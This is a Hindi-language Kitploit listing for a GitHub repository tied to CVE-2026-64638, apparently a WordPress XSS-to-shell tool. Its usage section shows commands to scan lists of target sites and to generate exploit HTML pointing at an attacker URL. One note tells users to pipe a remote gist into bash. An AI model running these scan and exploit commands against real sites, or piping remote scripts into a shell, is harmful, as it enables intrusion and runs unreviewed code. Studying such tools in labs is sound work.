Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-64638 — CVE-2026-64638 - ड्राफ्ट या TODO | Kitploit
उपकरण/GitHubGitHub/horkimhab/cve-2026-64638
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - ड्राफ्ट या TODO

रिपॉजिटरी देखें
151 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-64638

दान करें

इस प्रोजेक्ट के रखरखाव का समर्थन PayPal के माध्यम से या नीचे दिए गए QR कोड को स्कैन करके करें।

paypal

दान के लिए QR कोड

⚡ सरल उपयोग

इस प्रोजेक्ट का उपयोग केवल सुरक्षित और अधिकृत वातावरणों में करें, जैसे:

  • स्थानीय वर्चुअल मशीनें
  • Docker कंटेनर
  • पृथक लैब सेटअप
  • अधिकृत पैनेट्रेशन टेस्टिंग वातावरण

उदाहरण सेटअप:

git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

उदाहरण उपयोग:

# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

नोट:

  • अन्य प्रोजेक्ट से क्लोन करने पर नेस्टेड .git डायरेक्टरी को हटाने के लिए आपको curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y चलाना होगा।
  • उदा.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

श्रेय या संदर्भ

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 शैक्षणिक सुरक्षा अनुसंधान रिपॉजिटरी

नियंत्रित वातावरणों में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और अनुसंधान करने के लिए एक रिपॉजिटरी।


⚠️ सुरक्षा और कानूनी अस्वीकरण

उद्देश्य

यह रिपॉजिटरी केवल शैक्षणिक और अधिकृत सुरक्षा अनुसंधान के लिए है।

इसे उपयोगकर्ताओं को निम्नलिखित के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:

  • सुरक्षा कमजोरियाँ
  • सैंडबॉक्स और अलगाव अवधारणाएँ
  • सुरक्षित कोडिंग और रक्षात्मक अभ्यास

केवल अधिकृत उपयोग

इस रिपॉजिटरी का उपयोग केवल उन्हीं वातावरणों में करें जहाँ आपके पास अनुमति हो, जैसे:

  • व्यक्तिगत लैब या वर्चुअल मशीनें
  • Docker या पृथक वातावरण
  • अधिकृत पैनेट्रेशन टेस्टिंग
  • साइबर सुरक्षा प्रशिक्षण या शैक्षणिक अनुसंधान

अनधिकृत या अवैध उपयोग सख्त वर्जित है।


कोई दायित्व नहीं

लेखक और योगदानकर्ता इस प्रोजेक्ट के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी समस्या या हानि के लिए जिम्मेदार नहीं हैं।

इस रिपॉजिटरी का उपयोग करके, आप सहमत हैं कि:

  • आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं
  • आप इसका उपयोग कानूनी और नैतिक रूप से करेंगे
  • यह प्रोजेक्ट बिना किसी वारंटी के प्रदान किया गया है

नैतिक उपयोग

यह प्रोजेक्ट निम्नलिखित के लिए है:

  • रक्षात्मक सुरक्षा अनुसंधान
  • साइबर सुरक्षा शिक्षा
  • कमजोरियों के प्रति जागरूकता
  • सुरक्षित प्रणाली और सॉफ़्टवेयर अनुसंधान

कृपया जिम्मेदार प्रकटीकरण (responsible disclosure) प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।


संपर्क

जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से रिपॉजिटरी अनुरक्षक से संपर्क करें।

टूल डाउनलोड करें